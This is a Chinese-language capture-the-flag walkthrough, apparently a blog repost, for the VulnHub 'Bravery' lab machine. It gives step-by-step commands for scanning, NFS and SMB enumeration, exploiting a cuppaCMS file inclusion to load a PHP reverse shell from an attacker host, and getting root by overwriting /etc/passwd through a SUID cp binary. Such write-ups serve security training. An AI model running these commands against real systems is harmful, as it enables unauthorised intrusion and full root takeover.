OSCP难度靶机之Bravery-improved

admin 2025年2月24日14:02:25评论10 views字数 1745阅读5分49秒阅读模式

虚拟机信息:

虚拟机下载地址https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

虚拟机简介:可能有不止一种方法来获得此计算机上的root特权

目标:1个flag

级别:初级

1、通过netdiscover检测主机IP地址

  1. netdiscover -r 192.168.207.0/24

OSCP难度靶机之Bravery-improved

2、通过nmap进行端口扫描

  1. nmap -A -sS -sV -v -p- 192.168.207.163

通过扫描信息查看开放22、53、80、111、139、443、445、2049端口,并且检测到位WordPress4.8.3站点

OSCP难度靶机之Bravery-improved

OSCP难度靶机之Bravery-improved

3、WEB渗透测试

3.1 查看有nfs和smb服务,尝试nfs连接

  1. showmount -e 192.168.207.163

OSCP难度靶机之Bravery-improved

3.2 挂载文件系统

  1. mkdir /tmp/nsf
    mount -t nfs 192.168.207.163:/var/nfsshare /tmp/nsf

OSCP难度靶机之Bravery-improved

3.3 查看目录中文件,类似密码

OSCP难度靶机之Bravery-improved

3.4 使用enum4linux查看smb服务

  1. enum4linux 192.168.207.163

查看有anonymous和secured目录

OSCP难度靶机之Bravery-improved

3.5 访问匿名文件夹

  1. smbclient //192.168.207.163/anonymous
    password: qwertyuioplkjhgfdsazxcvbnm

没有发现有用的信息

OSCP难度靶机之Bravery-improved

3.6 尝试使用david用户访问secured文件夹

  1. smbclient //192.168.207.163/secured -U David
    password: qwertyuioplkjhgfdsazxcvbnm
    get david.txt
    get genevieve.txt
    get README.txt

下载共享文件

OSCP难度靶机之Bravery-improved

3.7 分别查看三个文件,得到网站访问目录

OSCP难度靶机之Bravery-improved

OSCP难度靶机之Bravery-improved

OSCP难度靶机之Bravery-improved

3.8 登录WEB查看,

  1. http://192.168.207.163/developmentsecretpage

OSCP难度靶机之Bravery-improved

  1. http://192.168.207.163/genevieve/

OSCP难度靶机之Bravery-improved

使用burp进行探测发现,有一个cuppaCMS

OSCP难度靶机之Bravery-improved

OSCP难度靶机之Bravery-improved

3.8 使用searchsploit进行查找,有一个文件包含

  1. searchsploit cuppa

OSCP难度靶机之Bravery-improved

3.9 查看POC

  1. cat /usr/share/exploitdb/exploits/php/webapps/25971.txt

OSCP难度靶机之Bravery-improved

3.10 使用POC反弹shell

  1. cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
    vim shell.php

OSCP难度靶机之Bravery-improved

3.11 开启http服务

  1. python -m SimpleHTTPServer
    nc -nlvp 4444
    http://192.168.207.163/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.207.129:8000/shell.php?

OSCP难度靶机之Bravery-improved

3.12 获取反弹shell

OSCP难度靶机之Bravery-improved

3.13 使用python优化脚本

  1. python -c 'import pty;pty.spawn("/bin/bash")'

OSCP难度靶机之Bravery-improved

4、系统提权

4.1 查找有suid的二进制文件

  1. find / -perm -u=s -type f 2>/dev/null

发现cp有suid的权限

OSCP难度靶机之Bravery-improved

4.2 需要在kali机器上创建一个用户保存到/etc/passwd

密码为:hacker

  1. perl -le 'print crypt("hacker","salt")'

使用perl生成加盐密码

OSCP难度靶机之Bravery-improved

创建账号为hacker

  1. cp /etc/passwd ./
    echo 'hacker:sagIxVoGwjNkY:0:0::/root:/bin/bash' >> passwd

OSCP难度靶机之Bravery-improved

4.3 在服务器上下载passwd文件

在kali上开启http服务

  1. python -m SimpleHTTPServer

OSCP难度靶机之Bravery-improved

在服务器上下载passwd文件

  1. cd /tmp
    wget http://192.168.207.129:8000/passwd
    cp passwd /etc/passwd

OSCP难度靶机之Bravery-improved

4.4 切换账号为hacker,查看flag

  1. su - hacker
    ls /root/

OSCP难度靶机之Bravery-improved

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Bravery-improved

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月24日14:02:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Bravery-improvedhttps://cn-sec.com/archives/861101.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息